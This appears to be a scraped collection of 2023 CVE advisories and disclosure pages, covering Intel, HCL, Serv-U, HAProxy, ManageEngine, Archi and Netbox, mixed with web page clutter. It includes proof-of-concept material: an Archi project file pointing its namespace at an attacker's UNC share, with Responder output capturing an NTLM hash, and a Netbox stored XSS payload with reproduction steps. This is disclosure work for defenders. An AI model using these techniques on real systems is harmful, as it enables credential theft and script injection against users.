Uncontrolled search path element in some Intel(R) PSR SDK before version 1.0.0.20 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE-2023-29151

When the app is put to the background and the user goes to the task switcher of iOS, the app snapshot is not blurred which may reveal sensitive information.


 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2023-37513: Knowledge Article View HCL - Customer Support

CVE-2023-37512: Knowledge Article View HCL - Customer Support

If certain App Transport Security (ATS) settings are set in a certain manner, insecure loading of web content can be achieved.


CVE-2023-37511: Knowledge Article View HCL - Customer Support

Business Logic Errors in GitHub repository froxlor/froxlor prior to 2.0.22,2.1.0.

CVE-2023-4304: huntr – Security Bounties for any GitHub repository


A vulnerability has been identified within Serv-U 15.4 that, if exploited, allows an actor to bypass multi-factor/two-factor authentication. The actor must have administrator-level access to Serv-U to perform this action. 



CVE-2023-35179

An NTLM Hash Disclosure was discovered in ArchiMate Archi before 5.1.0. When parsing the XMLNS value of an ArchiMate project file, if the namespace does not match the expected ArchiMate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept a guest account, the host will try to authenticate on the share by using the current user's session. NOTE: this issue occurs because Archi uses an unsafe configuration of the Eclipse Modeling Framework.

**Version of Archi**

5.0.2

**Description**

When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept guest account, the host will try to authenticate on the share using the current user's session.

**Impact**

A malicious user can capture NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.

**Technical fix**

Do not allow the application’s functionality to resolve or load UNC paths.

**Technical Details**

“archimate” project are saved as XML file using the extension .archimate . The below example is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is place on the diagram “Default View” (link by the ID  
e79145c...).

    <?xml version="1.0" encoding="UTF-8"?>
    <archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="http://www.archimatetool.com/archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
      <folder name="Strategy" id="id-2ab87f8808194aafb76570f1480511a1" type="strategy"/>
      <folder name="Business" id="id-2e5d95fb12be42589b1e494dfc79dd2a" type="business">
        <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-e79145cce35a4704a19ba22885cfc9d2"/>
      </folder>
      <folder name="Application" id="id-53a1acc2e38c4d7db125ccd25dc6892d" type="application"/>
      <folder name="Technology &amp; Physical" id="id-24c7dc79bf11478ea65391ef16835543" type="technology"/>
      <folder name="Motivation" id="id-dc391a764cd141d389af3b3b4a81a94a" type="motivation"/>
      <folder name="Implementation &amp; Migration" id="id-90400d4328f448779016a63ad6eab713" type="implementation_migration"/>
      <folder name="Other" id="id-276cb2473edf4874a5854257ed930166" type="other"/>
      <folder name="Relations" id="id-8a1f3df198fa44c7b271f846e4fa1d12" type="relations"/>
      <folder name="Views" id="id-bdcce9aa0bb64f4386ebc4ef4a90fa1b" type="diagrams">
        <element xsi:type="archimate:ArchimateDiagramModel" name="Default View" id="id-fb6015c3baa2446d90238f15a70a5adb">
          <child xsi:type="archimate:DiagramObject" id="id-be3e6f080b904e2496cf1d89f8965c15" archimateElement="id-e79145cce35a4704a19ba22885cfc9d2">
            <bounds x="571" y="332" width="120" height="55"/>
          </child>
        </element>
      </folder>
    </archimate:model>
    

The xmlns:archimate is pointing to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource, and in case a UNC is provided, the host will try to access the share drive and if need be, try to authenticate.

In the following example, the attacker is running the Responder tool ( Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that the xmlns:archimate is pointing to \\172.16.227.1\\share\\archimate.

    <?xml version="1.0" encoding="UTF-8"?>
    <archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="\\172.16.227.1\share\archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
    [...]
    

Whenever the victim is opening the modified file, the application will try to access the resource via the host and authenticate on the fake SMB share created by Responder.py.

    sudo ./Responder.py -I vmnet8
    [...]
    [+] Listening for events...
    [...]
    [SMB] NTLMv2-SSP Client: 172.16.227.169
    [SMB] NTLMv2-SSP Username : LAB\tester
    [SMB] NTLMv2-SSP Hash:
    test::LAB:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxx[...]
    

As seen in the output above, the NTLM hash is leaked and could be used to crack the user's password.

CVE-2023-40235: NTLM Hash Disclosure (v5.0.2) · Issue #946 · archimatetool/archi

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

Zoho ManageEngine Applications Manager through 16530 allows reflected XSS while logged in.

**Reflected XSS Vulnerability**  

Vulnerability Details

Severity

**High**

CVE ID

CVE-2023-38333

Affected software versions

Version 16530 and below

Fixed Version

Version 16367 to 16369  
Version 16424 to 16429  
Version 16512 to 16519  
Version 16540 and above

Fixed On

3 July 2023

**Details**

Reflected XSS Vulnerability in a login url allows attacker to craft a malicious JavaScript payload. When clicking the crafted url that is shared by an attacker, malicious JavaScript gets executed in the victim browser.

**Impact**

This vulnerability executes JavaScript in the victim's browser controlled by the attacker to carry out any of the actions that are applicable to the corresponding role of the victim in Applications Manager.

**Fix**

Applications Manager version 16540 and above fixes this issue by using proper defence mechanisms against Cross-Site Scripting(XSS) vulnerability.

**Steps to update**

Update your Applications Manager instance to the latest build using the service pack.

**Source and Acknowledgements**

Find out more about CVE-2023-38333 from CVE Directory and NIST NVD.

**Reported by:**

Anonymous working with Trend Micro Zero Day Initiative.

**Need Help?**

For clarification or corrections please contact our support team or email us at appmanager-support@manageengine.com

CVE-2023-38333: Security Updates - CVE Details - CVE-2023-38333

A stored cross-site scripting (XSS) vulnerability in Netbox v3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

benjaminpsinclair / **Netbox-CVE-2023-37625** Public

*   Notifications
*   Fork 0
*   Star 0
    

0 stars 0 forks Activity

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Git stats**

*   **2** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

README.md

Netbox-CVE-2023-37625 Description Technical Details

**README.md**

**Netbox-CVE-2023-37625****Description**

A stored cross-site scripting (XSS) vulnerability in Netbox < 3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates.

**Technical Details**

A stored Cross-Site Scripting vulnerability was discovered in the custom link function of the web application. This vulnerability is a result of insufficient sanitisation of the Link URL field.

To reproduce this vulnerability, the following steps may be performed:

1.  Navigate to Custom Links under the Other tab.
2.  Create a custom link with the following Link URL value, and assign the link to a model. In this example 'manufacturer' has been selected.:

    {{'test1"</a><script>alert(1)</script>'}}
    

3.  Add a new model, in this example add a 'manufacturer' model.

4.  Open the newly created model as any authenticated user, and observer that the alert box has executed.

**About**

No description, website, or topics provided.

**Resources**

Readme

Activity

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published